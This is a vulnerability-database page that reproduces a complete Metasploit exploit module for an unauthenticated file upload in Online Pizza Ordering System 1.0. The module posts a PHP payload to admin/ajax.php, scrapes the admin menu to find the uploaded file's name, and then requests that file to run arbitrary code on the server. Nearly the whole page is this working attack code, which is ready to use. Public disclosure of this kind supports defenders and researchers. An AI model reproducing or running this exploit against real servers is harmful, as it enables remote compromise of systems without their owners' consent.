Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Online Pizza Ordering System 1.0 Shell Upload

🗓️ 12 Sep 2023 00:00:00Reported by Sefa Ozan, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 212 Views

Exploit in Online Pizza Ordering System allows arbitrary code executio

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Online Pizza Ordering System PHP File Upload Vulnerability",  
'Description' => %q{  
This module exploits a vulnerability found in Online Pizza Ordering System By abusing the  
admin_class.php file, a malicious user can upload a file to the img/ directory  
without any authentication, which results in arbitrary code execution. The module  
has been tested successfully on Ubuntu 22.04.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Sefa Ozan' # author & msf module  
],  
'References' =>  
[  
['URL', 'https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['Online Pizza Ordering System', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => '2023-09-11',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to Online Pizza Ordering System', '/php-opos'])  
])  
end  
  
def check  
uri = target_uri.path  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "admin", "ajax.php")  
})  
  
if res and res.code == 200  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
uri = normalize_uri(target_uri.path)  
uri << '/' if uri[-1,1] != '/'  
payload_name = rand_text_alpha(rand(10) + 5) + '.php'  
boundary = Rex::Text.rand_text_hex(7)  
  
post_data = "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"id\"\r\n\r\n\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n"  
post_data << "#{boundary}\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"description\"\r\n\r\n"  
post_data << "#{boundary}\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"status\"\r\n\r\n"  
post_data << "on\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"category_id\"\r\n\r\n"  
post_data << "3\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"price\"\r\n\r\n"  
post_data << "1\r\n"  
post_data << "-----------------------------#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"img\"; filename=\"#{payload_name}\"\r\n\r\n\r\n"  
post_data << "<?php "  
post_data << payload.encoded  
post_data << " ?>\r\n"  
post_data << "-----------------------------#{boundary}--\r\n"  
  
print_status("Sending PHP payload (#{payload_name})")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, "admin", "ajax.php?action=save_menu"),  
'ctype' => "multipart/form-data; boundary=---------------------------#{boundary}",  
'data' => post_data  
})  
  
# If the server does not return 200 and the body does not contain 1,  
# we assume we couldn't uploaded the malicious php file.  
if not res or res.code != 200 or !res.body.include?("1")  
print_error("File wasn't uploaded, aborting!")  
return  
end  
  
#Geting our malicious php file's exact name on the server.  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "admin", "index.php?page=menu")  
})  
  
# Trying to find our malicious file's name on the server with this ugly regex.  
if res and res.body.include?("#{payload_name}")  
match = res.body.match('data\-name="' + boundary + '" data\-status="1" data\-description="' + boundary + '" data\-price="1" data\-category_id="3" data\-img_path="(.*?' + payload_name + ')">Edit<')[1]  
end  
  
print_status("Executing PHP payload")  
# Executing our payload  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, "assets", "img", "#{match}")  
})  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
metasploitphpfile upload
212